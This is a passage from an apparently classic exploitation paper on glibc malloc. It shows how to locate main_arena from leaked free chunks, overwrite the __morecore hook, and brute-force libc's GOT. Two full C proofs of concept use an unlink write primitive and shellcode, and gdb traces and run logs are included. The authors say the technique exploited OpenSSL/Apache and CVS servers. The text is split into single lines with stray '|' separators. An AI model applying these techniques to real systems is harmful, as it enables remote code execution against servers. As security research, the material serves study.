ptr] ----> [<- chunk ->] [<- chunk ->] [<- bk
|
|
[bin_n+1] (last chunk)
|
|
|
|
.
|
|
.
|
|
.
|
|
|
|
[bin_X]
|
|
ptr] ----> [<- fd
|
|
[ lonely but interesting chunk
|
|
ptr] ----> [<- bk
|
|
.
|
|
.
|
|
|
|
This is really nice, as it allows us to recognize within the
|
|
heap which address is pointing to a bin, located in libc's space address
|
|
more exactly, to some place in the main_arena as this head of the bin
|
|
list is located in the main_arena.
|
|
|
|
Then, we can look for two equal memory addresses, one next to the
|
|
other, pointing to libc's memory (looking for addresses of
|
|
the form 0x4....... is enough for our purpose). We can suppose these
|
|
pairs of addresses we found are part of a free chunk which is the only
|
|
one hanging of a bin, we know it looks like...
|
|
|
|
size | fd | bk
|
|
|
|
How easy is to find a lonely chunk in the heap immensity?
|
|
First, this depends on the exploitation scenario and the exploited process
|
|
heap layout. For example, when exploiting the OpenSSL bug along different
|
|
targets, we could always find at least a lonely chunk within the leaked
|
|
heap memory.
|
|
Second, there is another scenario in which we will be able to locate
|
|
a malloc bin, even without the capability to find a lonely chunk. If
|
|
we are able to find the first or last chunk of a bin, one of its
|
|
pointers will reference an address within main_arena, while the
|
|
other one will point to another free chunk in the process heap. So,
|
|
we'll be looking for pairs of valid pointers like these:
|
|
|
|
[ ptr_2_libc's_memory | ptr_2_process'_heap ]
|
|
|
|
or
|
|
|
|
[ ptr_2_process'_heap | ptr_2_libc's_memory ]
|
|
|
|
We must take into account that this heuristic will not be as accurate
|
|
as searching for a pair of equal pointers to libc's space address, but
|
|
as we already said, it's possible to cross-check between multiple possible
|
|
chunks.
|
|
Finally, we must remember this depends totally on the way we are
|
|
abusing the process to read its memory. In case we can read arbitrary
|
|
addresses of memory, this is not an issue, the problem gets harder
|
|
as more limited is our mechanism to retrieve remote memory.
|
|
|
|
--] 4.5.2 Morecore
|
|
|
|
Here, we show how to find a function pointer within the libc after
|
|
obtaining a malloc bin address, using one of the before explained
|
|
mechanisms.
|
|
|
|
Using the size field of the retrieved chunk header and the bin_index() or
|
|
smallbin_index() macro we obtain the exact address of the main_arena.
|
|
We can cross check between multiple supposed lonely chunks that the
|
|
main_arena address we obtained is the real one, depending on the
|
|
quantity of lonely chunks pairs we'll be more sure. As long as the
|
|
process doesn't crash, we may retrieve heap memory several times, as
|
|
main_arena won't change its location. Moreover, I think it
|
|
wouldn't be wrong to assume main_arena is located in the same address
|
|
across different processes (this depends on the address on which the
|
|
libc is mapped). This may even be true across different servers
|
|
processes, allowing us to retrieve the main_arena through a leak in a
|
|
process different from the one being actively exploited.
|
|
|
|
Just 32 bytes before &main_arena[0] is located __morecore.
|
|
|
|
Void_t *(*__morecore)() = __default_morecore;
|
|
|
|
MORECORE() is the name of the function that is called through malloc
|
|
code in order to obtain more memory from the operating system, it
|
|
defaults to sbrk().
|
|
|
|
Void_t * __default_morecore ();
|
|
Void_t *(*__morecore)() = __default_morecore;
|
|
#define MORECORE (*__morecore)
|
|
|
|
The following disassembly shows how MORECORE is called from chunk_alloc()
|
|
code, an indirect call to __default_morecore is performed by default:
|
|
|
|
<chunk_alloc+1468>: mov 0x64c(%ebx),%eax
|
|
<chunk_alloc+1474>: sub $0xc,%esp
|
|
<chunk_alloc+1477>: push %esi
|
|
<chunk_alloc+1478>: call *(%eax)
|
|
|
|
where $eax points to __default_morecore
|
|
|
|
(gdb) x/x $eax
|
|
0x4212df80 <__morecore>: 0x4207e034
|
|
|
|
(gdb) x/4i 0x4207e034
|
|
0x4207e034 <__default_morecore>: push %ebp
|
|
0x4207e035 <__default_morecore+1>: mov %esp,%ebp
|
|
0x4207e037 <__default_morecore+3>: push %ebx
|
|
0x4207e038 <__default_morecore+4>: sub $0x10,%esp
|
|
|
|
|
|
MORECORE() is called from the malloc() algorithm to extend the memory top,
|
|
requesting the operating system via the sbrk.
|
|
|
|
MORECORE() gets called twice from malloc_extend_top()
|
|
|
|
brk = (char*)(MORECORE (sbrk_size));
|
|
...
|
|
/* Allocate correction */
|
|
new_brk = (char*)(MORECORE (correction));
|
|
|
|
|
|
which is called by chunk_alloc():
|
|
|
|
/* Try to extend */
|
|
malloc_extend_top(ar_ptr, nb);
|
|
|
|
Also, MORECORE is called by main_trim() and top_chunk().
|
|
|
|
|
|
We just need to sit and wait until the code reaches any of these points.
|
|
In some cases it may be necessary to arrange things in order to avoid the
|
|
code crashing before.
|
|
The morecore function pointer is called each time the heap needs to be
|
|
extended, so forcing the process to allocate a lot of memory is
|
|
recommended after overwriting the pointer.
|
|
In case we are not able to avoid a crash before taking control of the
|
|
process, there's no problem (unless the server dies completely), as we can
|
|
expect the libc to be mapped in the same address in most cases.
|
|
|
|
--] 4.5.2.1 Proof of concept 5 : Jumping with morecore
|
|
|
|
The following code just shows to get the required information from a
|
|
freed chunk, calculates the address of __morecore and forces a call
|
|
to MORECORE() after having overwritten it.
|
|
|
|
[jp@vaiolator heapy]$ ./heapy
|
|
(-) lonely chunk was freed, gathering information...
|
|
(!) sz = 520 - bk = 0x4212E1A0 - fd = 0x4212E1A0
|
|
(!) the chunk is in bin number 64
|
|
(!) &main_arena[0] @ 0x4212DFA0
|
|
(!) __morecore @ 0x4212DF80
|
|
(-) overwriting __morecore...
|
|
(-) forcing a call to MORECORE()...
|
|
Segmentation fault
|
|
|
|
Let's look what happened with gdb, we'll also be using a simple
|
|
modified malloc in the form of a shared library to know what is
|
|
going on inside malloc's internal structures.
|
|
|
|
[jp@vaiolator heapy]$ gdb heapy
|
|
GNU gdb Red Hat Linux (5.2-2)
|
|
Copyright 2002 Free Software Foundation, Inc.
|
|
GDB is free software, covered by the GNU General Public License, and you are
|
|
welcome to change it and/or distribute copies of it under certain conditions.
|
|
Type "show copying" to see the conditions.
|
|
There is absolutely no warranty for GDB. Type "show warranty" for details.
|
|
This GDB was configured as "i386-redhat-linux"...
|
|
(gdb) r
|
|
Starting program: /home/jp/cerebro//heapy/morecore
|
|
(-) lonely chunk was freed, gathering information...
|
|
(!) sz = 520 - bk = 0x4212E1A0 - fd = 0x4212E1A0
|
|
(!) the chunk is in bin number 64
|
|
(!) &main_arena[0] @ 0x4212DFA0
|
|
(!) __morecore @ 0x4212DF80
|
|
(-) overwriting __morecore...
|
|
(-) forcing a call to MORECORE()...
|
|
|
|
Program received signal SIGSEGV, Segmentation fault.
|
|
0x41414141 in ?? ()
|
|
|
|
|
|
Taking a look at the output step by step:
|
|
|
|
First we alloc our lonely chunk:
|
|
chunk = (unsigned int*)malloc(CHUNK_SIZE);
|
|
(gdb) x/8x chunk-1
|
|
0x80499d4: 0x00000209 0x00000000 0x00000000 0x00000000
|
|
0x80499e4: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
|
|
Note we call malloc() again with another pointer, letting this aux
|
|
pointer be the chunk next to the top_chunk... to avoid the
|
|
differences in the way it is handled when freed with our purposes
|
|
(remember in this special case the chunk would be coalesced with the
|
|
top_chunk without getting linked to any bin):
|
|
|
|
aux = (unsigned int*)malloc(0x0);
|
|
|
|
[1422] MALLOC(512) - CHUNK_ALLOC(0x40019bc0,520)
|
|
- returning 0x8049a18 from top_chunk
|
|
- new top 0x8049c20 size 993
|
|
[1422] MALLOC(0) - CHUNK_ALLOC(0x40019bc0,16)
|
|
- returning 0x8049c20 from top_chunk
|
|
- new top 0x8049c30 size 977
|
|
|
|
This is the way the heap looks like up to now...
|
|
|
|
--- HEAP DUMP ---
|
|
ADDRESS SIZE FLAGS
|
|
sbrk_base 0x80499f8
|
|
chunk 0x80499f8 33(0x21) (inuse)
|
|
chunk 0x8049a18 521(0x209) (inuse)
|
|
chunk 0x8049c20 17(0x11) (inuse)
|
|
chunk 0x8049c30 977(0x3d1) (top)
|
|
sbrk_end 0x804a000
|
|
|
|
--- HEAP LAYOUT ---
|
|
|A||A||A||T|
|
|
|
|
--- BIN DUMP ---
|
|
ar_ptr = 0x40019bc0 - top(ar_ptr) = 0x8049c30
|
|
|
|
No bins at all exist now, they are completely empty.
|
|
|
|
After that we free him:
|
|
free(chunk);
|
|
|
|
[1422] FREE(0x8049a20) - CHUNK_FREE(0x40019bc0,0x8049a18)
|
|
- fronlink(0x8049a18,520,64,0x40019dc0,0x40019dc0)
|
|
- new free chunk
|
|
|
|
(gdb) x/8x chunk-1
|
|
0x80499d4: 0x00000209 0x4212e1a0 0x4212e1a0 0x00000000
|
|
0x80499e4: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
|
|
The chunk was freed and inserted into some bin... which was empty as
|
|
this was the first chunk freed. So this is a 'lonely chunk', the
|
|
only chunk in one bin.
|
|
Here we can see both bk and fd pointing to the same address in
|
|
libc's memory, let's see how the main_arena looks like now:
|
|
|
|
0x4212dfa0 <main_arena>: 0x00000000 0x00010000 0x08049be8 0x4212dfa0
|
|
0x4212dfb0 <main_arena+16>: 0x4212dfa8 0x4212dfa8 0x4212dfb0 0x4212dfb0
|
|
0x4212dfc0 <main_arena+32>: 0x4212dfb8 0x4212dfb8 0x4212dfc0 0x4212dfc0
|
|
0x4212dfd0 <main_arena+48>: 0x4212dfc8 0x4212dfc8 0x4212dfd0 0x4212dfd0
|
|
0x4212dfe0 <main_arena+64>: 0x4212dfd8 0x4212dfd8 0x4212dfe0 0x4212dfe0
|
|
0x4212dff0 <main_arena+80>: 0x4212dfe8 0x4212dfe8 0x4212dff0 0x4212dff0
|
|
0x4212e000 <main_arena+96>: 0x4212dff8 0x4212dff8 0x4212e000 0x4212e000
|
|
0x4212e010 <main_arena+112>: 0x4212e008 0x4212e008 0x4212e010 0x4212e010
|
|
0x4212e020 <main_arena+128>: 0x4212e018 0x4212e018 0x4212e020 0x4212e020
|
|
0x4212e030 <main_arena+144>: 0x4212e028 0x4212e028 0x4212e030 0x4212e030
|
|
...
|
|
...
|
|
0x4212e180 <main_arena+480>: 0x4212e178 0x4212e178 0x4212e180 0x4212e180
|
|
0x4212e190 <main_arena+496>: 0x4212e188 0x4212e188 0x4212e190 0x4212e190
|
|
0x4212e1a0 <main_arena+512>: 0x4212e198 0x4212e198 0x080499d0 0x080499d0
|
|
0x4212e1b0 <main_arena+528>: 0x4212e1a8 0x4212e1a8 0x4212e1b0 0x4212e1b0
|
|
0x4212e1c0 <main_arena+544>: 0x4212e1b8 0x4212e1b8 0x4212e1c0 0x4212e1c0
|
|
|
|
Note the completely just initialized main_arena with all its bins
|
|
pointing to themselves, and the just added free chunk to one of the
|
|
bins...
|
|
|
|
(gdb) x/4x 0x4212e1a0
|
|
0x4212e1a0 <main_arena+512>: 0x4212e198 0x4212e198 0x080499d0 0x080499d0
|
|
|
|
Also, both bin pointers refer to our lonely chunk.
|
|
|
|
Let's take a look at the heap in this moment:
|
|
|
|
--- HEAP DUMP ---
|
|
ADDRESS SIZE FLAGS
|
|
sbrk_base 0x80499f8
|
|
chunk 0x80499f8 33(0x21) (inuse)
|
|
chunk 0x8049a18 521(0x209) (free) fd = 0x40019dc0 | bk = 0x40019dc0
|
|
chunk 0x8049c20 16(0x10) (inuse)
|
|
chunk 0x8049c30 977(0x3d1) (top)
|
|
sbrk end 0x804a000
|
|
|
|
--- HEAP LAYOUT ---
|
|
|A||64||A||T|
|
|
|
|
--- BIN DUMP ---
|
|
ar_ptr = 0x40019bc0 - top(ar_ptr) = 0x8049c30
|
|
bin -> 64 (0x40019dc0)
|
|
free_chunk 0x8049a18 - size 520
|
|
|
|
|
|
Using the known size of the chunk, we know in which bin it was
|
|
placed, so we can get main_arena's address and, finally, __morecore.
|
|
|
|
(gdb) x/16x 0x4212dfa0-0x20
|
|
0x4212df80 <__morecore>: 0x4207e034 0x00000000 0x00000000 0x00000000
|
|
0x4212df90 <__morecore+16>: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
0x4212dfa0 <main_arena>: 0x00000000 0x00010000 0x08049be8 0x4212dfa0
|
|
0x4212dfb0 <main_arena+16>: 0x4212dfa8 0x4212dfa8 0x4212dfb0 0x4212dfb0
|
|
|
|
Here, by default __morecore points to __default_morecore:
|
|
|
|
(gdb) x/20i __morecore
|
|
0x4207e034 <__default_morecore>: push %ebp
|
|
0x4207e035 <__default_morecore+1>: mov %esp,%ebp
|
|
0x4207e037 <__default_morecore+3>: push %ebx
|
|
0x4207e038 <__default_morecore+4>: sub $0x10,%esp
|
|
0x4207e03b <__default_morecore+7>: call 0x4207e030 <memalign_hook_ini+64>
|
|
0x4207e040 <__default_morecore+12>: add $0xb22cc,%ebx
|
|
0x4207e046 <__default_morecore+18>: mov 0x8(%ebp),%eax
|
|
0x4207e049 <__default_morecore+21>: push %eax
|
|
0x4207e04a <__default_morecore+22>: call 0x4201722c <_r_debug+33569648>
|
|
0x4207e04f <__default_morecore+27>: mov 0xfffffffc(%ebp),%ebx
|
|
0x4207e052 <__default_morecore+30>: mov %eax,%edx
|
|
0x4207e054 <__default_morecore+32>: add $0x10,%esp
|
|
0x4207e057 <__default_morecore+35>: xor %eax,%eax
|
|
0x4207e059 <__default_morecore+37>: cmp $0xffffffff,%edx
|
|
0x4207e05c <__default_morecore+40>: cmovne %edx,%eax
|
|
0x4207e05f <__default_morecore+43>: mov %ebp,%esp
|
|
0x4207e061 <__default_morecore+45>: pop %ebp
|
|
0x4207e062 <__default_morecore+46>: ret
|
|
0x4207e063 <__default_morecore+47>: lea 0x0(%esi),%esi
|
|
0x4207e069 <__default_morecore+53>: lea 0x0(%edi,1),%edi
|
|
|
|
To conclude, we overwrite __morecore with a bogus address, and force
|
|
malloc to call __morecore:
|
|
|
|
*(unsigned int*)morecore = 0x41414141;
|
|
chunk=(unsigned int*)malloc(CHUNK_SIZE*4);
|
|
|
|
[1422] MALLOC(2048) - CHUNK_ALLOC(0x40019bc0,2056)
|
|
- extending top chunk
|
|
- previous size 976
|
|
|
|
Program received signal SIGSEGV, Segmentation fault.
|
|
0x41414141 in ?? ()
|
|
|
|
(gdb) bt
|
|
#0 0x41414141 in ?? ()
|
|
#1 0x4207a148 in malloc () from /lib/i686/libc.so.6
|
|
#2 0x0804869d in main (argc=1, argv=0xbffffad4) at heapy.c:52
|
|
#3 0x42017589 in __libc_start_main () from /lib/i686/libc.so.6
|
|
|
|
(gdb) frame 1
|
|
#1 0x4207a148 in malloc () from /lib/i686/libc.so.6
|
|
(gdb) x/i $pc-0x5
|
|
0x4207a143 <malloc+195>: call 0x4207a2f0 <chunk_alloc>
|
|
(gdb) disass chunk_alloc
|
|
Dump of assembler code for function chunk_alloc:
|
|
...
|
|
0x4207a8ac <chunk_alloc+1468>: mov 0x64c(%ebx),%eax
|
|
0x4207a8b2 <chunk_alloc+1474>: sub $0xc,%esp
|
|
0x4207a8b5 <chunk_alloc+1477>: push %esi
|
|
0x4207a8b6 <chunk_alloc+1478>: call *(%eax)
|
|
|
|
At this point we see chunk_alloc trying to jump to __morecore
|
|
|
|
(gdb) x/x $eax
|
|
0x4212df80 <__morecore>: 0x41414141
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
|
|
/* some malloc code... */
|
|
#define MAX_SMALLBIN 63
|
|
#define MAX_SMALLBIN_SIZE 512
|
|
#define SMALLBIN_WIDTH 8
|
|
#define is_small_request(nb) ((nb) < MAX_SMALLBIN_SIZE - SMALLBIN_WIDTH)
|
|
#define smallbin_index(sz) (((unsigned long)(sz)) >> 3)
|
|
#define bin_index(sz) \
|
|
(((((unsigned long)(sz)) >> 9) == 0) ? (((unsigned long)(sz)) >> 3):\
|
|
((((unsigned long)(sz)) >> 9) <= 4) ? 56 + (((unsigned long)(sz)) >> 6):\
|
|
((((unsigned long)(sz)) >> 9) <= 20) ? 91 + (((unsigned long)(sz)) >> 9):\
|
|
((((unsigned long)(sz)) >> 9) <= 84) ? 110 + (((unsigned long)(sz)) >> 12):\
|
|
((((unsigned long)(sz)) >> 9) <= 340) ? 119 + (((unsigned long)(sz)) >> 15):\
|
|
((((unsigned long)(sz)) >> 9) <= 1364) ? 124 + (((unsigned long)(sz)) >> 18):\
|
|
126)
|
|
|
|
#define SIZE_MASK 0x3
|
|
#define CHUNK_SIZE 0x200
|
|
|
|
int main(int argc, char *argv[]){
|
|
|
|
unsigned int *chunk,*aux,sz,bk,fd,bin,arena,morecore;
|
|
chunk = (unsigned int*)malloc(CHUNK_SIZE);
|
|
aux = (unsigned int*)malloc(0x0);
|
|
|
|
free(chunk);
|
|
printf("(-) lonely chunk was freed, gathering information...\n");
|
|
|
|
sz = chunk[-1] & ~SIZE_MASK;
|
|
fd = chunk[0];
|
|
bk = chunk[1];
|
|
|
|
if(bk==fd) printf("\t(!) sz = %u - bk = 0x%X - fd = 0x%X\n",sz,bk,fd);
|
|
else printf("\t(X) bk != fd ...\n"),exit(-1);
|
|
|
|
bin = is_small_request(sz)? smallbin_index(sz) : bin_index(sz);
|
|
printf("\t(!) the chunk is in bin number %d\n",bin);
|
|
|
|
arena = bk-bin*2*sizeof(void*);
|
|
printf("\t(!) &main_arena[0] @ 0x%X\n",arena);
|
|
|
|
morecore = arena-32;
|
|
printf("\t(!) __morecore @ 0x%X\n",morecore);
|
|
|
|
printf("(-) overwriting __morecore...\n");
|
|
*(unsigned int*)morecore = 0x41414141;
|
|
|
|
printf("(-) forcing a call to MORECORE()...\n");
|
|
chunk=(unsigned int*)malloc(CHUNK_SIZE*4);
|
|
|
|
return 7;
|
|
}
|
|
|
|
This technique works even when the process is loaded in a randomized
|
|
address space, as the address of the function pointer is gathered in
|
|
runtime from the targeted process. The mechanism is fully generic, as
|
|
every process linked to the glibc can be exploited this way.
|
|
Also, no bruteforcing is needed, as just one try is enough to exploit the
|
|
process.
|
|
On the other hand, this technique is not longer useful in newer libcs,
|
|
i.e. 2.2.93, a for the changed suffered by malloc code. A new approach
|
|
is suggested later to help in exploitation of these libc versions.
|
|
Morecore idea was successfully tested on different glibc versions and Linux
|
|
distributions default installs: Debian 2.2r0, Mandrake 8.1, Mandrake
|
|
8.2, Redhat 6.1, Redhat 6.2, Redhat 7.0, Redhat 7.2, Redhat 7.3 and
|
|
Slackware 2.2.19 (libc-2.2.3.so).
|
|
Exploit code using this trick is able to exploit the vulnerable
|
|
OpenSSL/Apache servers without any hardcoded addresses in at least the
|
|
above mentioned default distributions.
|
|
|
|
--] 4.5.3 Libc's GOT bruteforcing
|
|
|
|
In case the morecore trick doesn't work (we can try, as just requires
|
|
one try), meaning probably that our target is using a newer libc, we
|
|
still have the obtained glibc's bin address. We know that above that
|
|
address is going to be located the glibc's GOT.
|
|
We just need to bruteforce upwards until hitting any entry of a going to
|
|
be called libc function. This bruteforce mechanism may take a while, but
|
|
not more time that should be needed to bruteforce the main object's GOT
|
|
(in case we obtained its aproximate location some way).
|
|
To speed up the process, the bruteforcing start point should be obtained
|
|
by adjusting the retrieved bin address with a fixed value. This value
|
|
should be enough to avoid corrupting the arena to prevent crashing the
|
|
process. Also, the bruteforcing can be performed using a step size bigger
|
|
than one. Using a higher step value will need a less tries, but may miss
|
|
the GOT. The step size should be calculated considering the GOT size and
|
|
the number of GOT entries accesses between each try (if a higher number
|
|
of GOT entries are used, it's higher the probability of modifying an entry
|
|
that's going to be accessed).
|
|
After each try, it is important to force the server to perform as many
|
|
actions as possible, in order to make it call lots of different libc
|
|
calls so the probability of using the GOT entry that was overwritten
|
|
is higher.
|
|
|
|
Note the bruteforcing mechanism may crash the process in several ways, as
|
|
it is corrupting libc data.
|
|
|
|
As we obtained the address in runtime, we can be sure we are bruteforcing
|
|
the right place, even if the target is randomizing the process/lib address
|
|
space, and that we will end hitting some GOT entry.
|
|
In a randomized load address scenario, we'll need to hit a GOT entry
|
|
before the process crashes to exploit the obtained bin address if there
|
|
is no relationship between the load addresses in the crashed process (the
|
|
one we obtained the bin address from) and the new process handling our
|
|
new requests (i.e. forked processes may inherit father's memory layout in
|
|
some randomization implementations). However, the bruteforcing mechanism
|
|
can take into account the already tried offsets once it has obtained the
|
|
new bin address, as the relative offset between the bin and the GOT is
|
|
constant.
|
|
|
|
Moreover, this technique applies to any process linked to the glibc.
|
|
Note that we could be able to exploit a server bruteforcing some specific
|
|
function pointers (i.e. located in some structures such as network output
|
|
buffers), but these approach is more generic.
|
|
|
|
The libc's GOT bruteforcing idea was successfully tested in Redhat 8.0,
|
|
Redhat 7.2 and Redhat 7.1 default installations.
|
|
Exploit code bruteforcing libc's GOT is able to exploit the vulnerable
|
|
CVS servers without any hardcoded addresses in at least the above
|
|
mentioned default distributions.
|
|
|
|
--] 4.5.3.1 Proof of concept 6 : Hinted libc's GOT bruteforcing
|
|
|
|
The following code bruteforces itself. The process tries to find himself,
|
|
to finally end in an useless endless loop.
|
|
|
|
#include <stdio.h>
|
|
#include <fcntl.h>
|
|
|
|
#define ADJUST 0x200
|
|
#define STEP 0x2
|
|
|
|
#define LOOP_SC "\xeb\xfe"
|
|
#define LOOP_SZ 2
|
|
#define SC_SZ 512
|
|
#define OUTPUT_SZ 64 * 1024
|
|
|
|
#define SOMEOFFSET(x) 11 + (rand() % ((x)-1-11))
|
|
#define SOMECHUNKSZ 32 + (rand() % 512)
|
|
|
|
#define PREV_INUSE 1
|
|
#define IS_MMAP 2
|
|
#define NON_MAIN_ARENA 4
|
|
|
|
unsigned long *aa4bmoPrimitive(unsigned long what, unsigned long
|
|
where,unsigned long sz){
|
|
unsigned long *unlinkMe;
|
|
int i=0;
|
|
|
|
if(sz<13) sz = 13;
|
|
unlinkMe=(unsigned long*)malloc(sz*sizeof(unsigned long));
|
|
unlinkMe[i++] = -4;
|
|
unlinkMe[i++] = -4;
|
|
unlinkMe[i++] = -4;
|
|
unlinkMe[i++] = what;
|
|
unlinkMe[i++] = where-8;
|
|
unlinkMe[i++] = -4;
|
|
unlinkMe[i++] = -4;
|
|
unlinkMe[i++] = -4;
|
|
unlinkMe[i++] = what;
|
|
unlinkMe[i++] = where-8;
|
|
for(;i<sz;i++)
|
|
if(i%2)
|
|
unlinkMe[i] = ((-(i-8) * 4) & ~(IS_MMAP|NON_MAIN_ARENA)) | PREV_INUSE;
|
|
else
|
|
unlinkMe[i] = ((-(i-3) * 4) & ~(IS_MMAP|NON_MAIN_ARENA)) | PREV_INUSE;
|
|
|
|
free(unlinkMe+SOMEOFFSET(sz));
|
|
return unlinkMe;
|
|
}
|
|
|
|
/* just force some libc function calls between each bruteforcing iteration */
|
|
void do_little(void){
|
|
int w,r;
|
|
char buf[256];
|
|
sleep(0);
|
|
w = open("/dev/null",O_WRONLY);
|
|
r = open("/dev/urandom",O_RDONLY);
|
|
read(r,buf,sizeof(buf));
|
|
write(w,buf,sizeof(buf));
|
|
close(r);
|
|
close(w);
|
|
return;
|
|
}
|
|
|
|
int main(int argc, char **argv){
|
|
unsigned long *output,*bin=0;
|
|
unsigned long i=0,sz;
|
|
char *sc,*p;
|
|
unsigned long *start=0;
|
|
|
|
printf("\n## HINTED LIBC GOT BRUTEFORCING PoC ##\n\n");
|
|
|
|
sc = (char*) malloc(SC_SZ * LOOP_SZ);
|
|
printf("(-) %d bytes shellcode @ %p\n",SC_SZ,sc);
|
|
p = sc;
|
|
for(p=sc;p+LOOP_SZ<sc+SC_SZ;p+=LOOP_SZ)
|
|
memcpy(p,LOOP_SC,LOOP_SZ);
|
|
|
|
|
|
printf("(-) forcing bin address disclosure... ");
|
|
output = aa4bmoPrimitive(0xbfffffc0,0xbfffffc4,OUTPUT_SZ);
|
|
for(i=0;i<OUTPUT_SZ-1;i++)
|
|
if(output[i] == output[i+1] &&
|
|
((output[i] & 0xffff0000) != 0xffff0000) ) {
|
|
bin = (unsigned long*)output[i];
|
|
printf("%p\n",bin);
|
|
start = bin - ADJUST;
|
|
}
|
|
if(!bin){
|
|
printf("failed\n");
|
|
return 0;
|
|
}
|
|
|
|
if(argv[1]) i = strtoll(argv[1], (char **)NULL,0);
|
|
else i = 0;
|
|
|
|
printf("(-) starting libc GOT bruteforcing @ %p\n",start);
|
|
for(;;i++){
|
|
sz = SOMECHUNKSZ;
|
|
printf(" try #%.2d writing %p at %p using %6d bytes chunk\n",
|
|
i,sc,start-(i*STEP),s*sizeof(unsigned long));
|
|
aa4bmoPrimitive((unsigned long)sc,(unsigned long)(start-(i*STEP)),sz);
|
|
do_little();
|
|
}
|
|
|
|
printf("I'm not here, this is not happening\n");
|
|
}
|
|
|
|
Let's see what happens:
|
|
|
|
$ ./got_bf
|
|
|
|
## HINTED LIBC GOT BRUTEFORCING PoC ##
|
|
|
|
(-) 512 bytes shellcode @ 0x8049cb0
|
|
(-) forcing bin address disclosure... 0x4212b1dc
|
|
(-) starting libc GOT bruteforcing @ 0x4212a9dc
|
|
try #00 writing 0x8049cb0 at 0x4212a9dc using 1944 bytes chunk
|
|
try #01 writing 0x8049cb0 at 0x4212a9d4 using 588 bytes chunk
|
|
try #02 writing 0x8049cb0 at 0x4212a9cc using 1148 bytes chunk
|
|
try #03 writing 0x8049cb0 at 0x4212a9c4 using 1072 bytes chunk
|
|
try #04 writing 0x8049cb0 at 0x4212a9bc using 948 bytes chunk
|
|
try #05 writing 0x8049cb0 at 0x4212a9b4 using 1836 bytes chunk
|
|
...
|
|
try #140 writing 0x8049cb0 at 0x4212a57c using 1416 bytes chunk
|
|
try #141 writing 0x8049cb0 at 0x4212a574 using 152 bytes chunk
|
|
try #142 writing 0x8049cb0 at 0x4212a56c using 332 bytes chunk
|
|
Segmentation fault
|
|
|
|
We obtained 142 consecutive tries without crashing using random sized
|
|
chunks. We run our code again, starting from try number 143 this time,
|
|
note the program gets the base bruteforcing address again.
|
|
|
|
$ ./got_bf 143
|
|
|
|
## HINTED LIBC GOT BRUTEFORCING PoC ##
|
|
|
|
(-) 512 bytes shellcode @ 0x8049cb0
|
|
(-) forcing bin address disclosure... 0x4212b1dc
|
|
(-) starting libc GOT bruteforcing @ 0x4212a9dc
|
|
try #143 writing 0x8049cb0 at 0x4212a564 using 1944 bytes chunk
|
|
try #144 writing 0x8049cb0 at 0x4212a55c using 588 bytes chunk
|
|
try #145 writing 0x8049cb0 at 0x4212a554 using 1148 bytes chunk
|
|
try #146 writing 0x8049cb0 at 0x4212a54c using 1072 bytes chunk
|
|
try #147 writing 0x8049cb0 at 0x4212a544 using 948 bytes chunk
|
|
try #148 writing 0x8049cb0 at 0x4212a53c using 1836 bytes chunk
|
|
try #149 writing 0x8049cb0 at 0x4212a534 using 1132 bytes chunk
|
|
try #150 writing 0x8049cb0 at 0x4212a52c using 1432 bytes chunk
|
|
try #151 writing 0x8049cb0 at 0x4212a524 using 904 bytes chunk
|
|
try #152 writing 0x8049cb0 at 0x4212a51c using 2144 bytes chunk
|
|
try #153 writing 0x8049cb0 at 0x4212a514 using 2080 bytes chunk
|
|
Segmentation fault
|
|
|
|
It crashed much faster... probably we corrupted some libc data, or we have
|
|
reached the GOT...
|
|
|
|
$ ./got_bf 154
|
|
|
|
## HINTED LIBC GOT BRUTEFORCING PoC ##
|
|
|
|
(-) 512 bytes shellcode @ 0x8049cb0
|
|
(-) forcing bin address disclosure... 0x4212b1dc
|
|
(-) starting libc GOT bruteforcing @ 0x4212a9dc
|
|
try #154 writing 0x8049cb0 at 0x4212a50c using 1944 bytes chunk
|
|
Segmentation fault
|
|
|
|
$ ./got_bf 155
|
|
|
|
## HINTED LIBC GOT BRUTEFORCING PoC ##
|
|
|
|
(-) 512 bytes shellcode @ 0x8049cb0
|
|
(-) forcing bin address disclosure... 0x4212b1dc
|
|
(-) starting libc GOT bruteforcing @ 0x4212a9dc
|
|
try #155 writing 0x8049cb0 at 0x4212a504 using 1944 bytes chunk
|
|
try #156 writing 0x8049cb0 at 0x4212a4fc using 588 bytes chunk
|
|
try #157 writing 0x8049cb0 at 0x4212a4f4 using 1148 bytes chunk
|
|
Segmentation fault
|
|
|
|
$ ./got_bf 158
|
|
|
|
## HINTED LIBC GOT BRUTEFORCING PoC ##
|
|
|
|
(-) 512 bytes shellcode @ 0x8049cb0
|
|
(-) forcing bin address disclosure... 0x4212b1dc
|
|
(-) starting libc GOT bruteforcing @ 0x4212a9dc
|
|
try #158 writing 0x8049cb0 at 0x4212a4ec using 1944 bytes chunk
|
|
...
|
|
try #179 writing 0x8049cb0 at 0x4212a444 using 1244 bytes chunk
|
|
Segmentation fault
|
|
|
|
$ ./got_bf 180
|
|
|
|
## HINTED LIBC GOT BRUTEFORCING PoC ##
|
|
|
|
(-) 512 bytes shellcode @ 0x8049cb0
|
|
(-) forcing bin address disclosure... 0x4212b1dc
|
|
(-) starting libc GOT bruteforcing @ 0x4212a9dc
|
|
try #180 writing 0x8049cb0 at 0x4212a43c using 1944 bytes chunk
|
|
try #181 writing 0x8049cb0 at 0x4212a434 using 588 bytes chunk
|
|
try #182 writing 0x8049cb0 at 0x4212a42c using 1148 bytes chunk
|
|
try #183 writing 0x8049cb0 at 0x4212a424 using 1072 bytes chunk
|
|
Segmentation fault
|
|
|
|
$ ./got_bf 183
|
|
|
|
## HINTED LIBC GOT BRUTEFORCING PoC ##
|
|
|
|
(-) 512 bytes shellcode @ 0x8049cb0
|
|
(-) forcing bin address disclosure... 0x4212b1dc
|
|
(-) starting libc GOT bruteforcing @ 0x4212a9dc
|
|
try #183 writing 0x8049cb0 at 0x4212a424 using 1944 bytes chunk
|
|
try #184 writing 0x8049cb0 at 0x4212a41c using 588 bytes chunk
|
|
try #185 writing 0x8049cb0 at 0x4212a414 using 1148 bytes chunk
|
|
try #186 writing 0x8049cb0 at 0x4212a40c using 1072 bytes chunk
|
|
try #187 writing 0x8049cb0 at 0x4212a404 using 948 bytes chunk
|
|
try #188 writing 0x8049cb0 at 0x4212a3fc using 1836 bytes chunk
|
|
try #189 writing 0x8049cb0 at 0x4212a3f4 using 1132 bytes chunk
|
|
try #190 writing 0x8049cb0 at 0x4212a3ec using 1432 bytes chunk
|
|
|
|
